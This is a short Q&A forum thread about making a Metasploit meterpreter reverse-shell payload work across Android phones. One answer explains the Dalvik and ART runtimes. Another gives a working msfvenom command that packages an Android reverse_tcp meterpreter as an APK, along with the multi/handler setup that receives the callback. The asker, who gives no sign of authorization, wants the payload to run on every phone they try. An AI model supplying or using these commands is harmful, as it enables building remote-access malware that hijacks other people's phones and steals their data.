# Msfvenom meterpreter android architectures

Tags: android, metasploit, meterpreter, architecture

Is there any android architecture I can set my meterpreter reverse_http payload to that works on every android phone?

Basically, when I don't set any architecture it defaults to dalvik but that architecture does not seem to be working on every phone I try it on.

Answer (score 2, accepted):

The ART runtime/architecture was introduced in android 4.4.

It completely replaced the dalvik runtime in android 5.0.

So maybe you should use this knowledge to help you decide which architecture to target.

Comment: How to make a payload selecting ART as --arch ?

Answer (score 0):

The most common is the following:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R >/root/FILENAME.apk

• -p => Specify Payload
• LHOST => Your IP
• LPORT => Port You want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File

In Metasploit, you can use the following:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

and SET the relevant options such as LHOST and LPORT

Comment: yes i know, but there are some android phones like sony xperia e where the payload does not work